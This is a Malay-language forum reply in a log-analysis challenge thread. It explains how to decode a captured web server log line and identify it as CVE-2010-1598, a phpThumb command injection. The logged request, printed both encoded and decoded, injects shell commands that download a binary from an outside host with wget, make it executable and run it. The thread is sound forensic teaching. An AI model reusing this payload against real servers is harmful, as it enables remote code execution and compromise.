Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[TBD Challenge] Log Analysis Challenge #1
01-07-2013, 11:00 PM,
Post: #16
RE: [TBD Challenge] Log Analysis Challenge #1
(01-07-2013, 08:33 PM)matz Wrote:
Code:
1. CVE-2010-1598

Mana dapat ni?OK

tngk pada first request yng ip tu send kepada server..contoh yng nie..

Code:
156.17.223.158 - - [26/Dec/2011:21:08:49 +0800] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9 HTTP/1.1" 404 534 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

tu susah sikit nk nampak,sbb dia encode url, kau google apa2 "url decode" dan decode string tu, dpt camgini..

Code:
156.17.223.158 - - [26/Dec/2011:21:08:49  0800] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality  75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9 HTTP/1.1" 404 534 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

skrng dkt string tuh, kau cari apa2 keyword penting yng dpt bantu kau cari CVE tuh, bagi aku keyword penting dia ialah phpThumb.php?src=file.jpg&fltr

dh dpt keyword, open up ur google, search it.. ;d

https://encrypted.google.com/#output=sea...jpg%26fltr

kau akan jumpa banyak site yng refer keyword yng kau cari tuh dan hampir2 serupa dngn word dalam log tuh..

contohnya, dalam banyak2 result tu, kau bukak site pertama..

http://blog.spiderlabs.com/2011/12/honey...ected.html

bukak2 je, terpampang tuleh dkt situ CVE: CVE-2010-1598

tu ah answers dia ;d

dkt google, boleh je hng search benda nie -> phpThumb.php?src=file.jpg&fltr "CVE"

;d
Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
  Challenge - Paan 0b0x3d 7 885 11-12-2013, 02:42 AM
Last Post: JohnWhite
  TBD Challenge #1, Menang RM100 suhz 99 15,298 14-11-2013, 01:43 AM
Last Post: RFC792
  Programming Challenge 1 - Membina Segi Tiga s3m00t 49 8,430 29-10-2013, 09:22 PM
Last Post: Cybercrookz
  php reverse challenge lvl easy firdaushatta 10 1,111 25-07-2013, 02:18 AM
Last Post: firdaushatta
  [TBD Challenge] Data Forensic v0.0.0.0.0xXXXX1029939392 RFC792 24 2,821 06-07-2013, 07:12 PM
Last Post: RFC792
  Steganography Challenge suhz 35 2,964 04-07-2013, 01:18 PM
Last Post: Codeshift3r
  [PHP] Challenge Reverse This Function ! shahril 12 1,387 26-06-2013, 12:58 PM
Last Post: akif
  Firefly Challenge UnKn0wN 24 3,066 28-10-2012, 09:33 PM
Last Post: shadowmacx
  Wargames2012 Challenge Ahlspiess 26 4,957 21-07-2012, 06:19 PM
Last Post: kryp70
  Pijat challenge #1 pijat 5 1,315 20-06-2012, 11:05 PM
Last Post: kryp70

Forum Jump: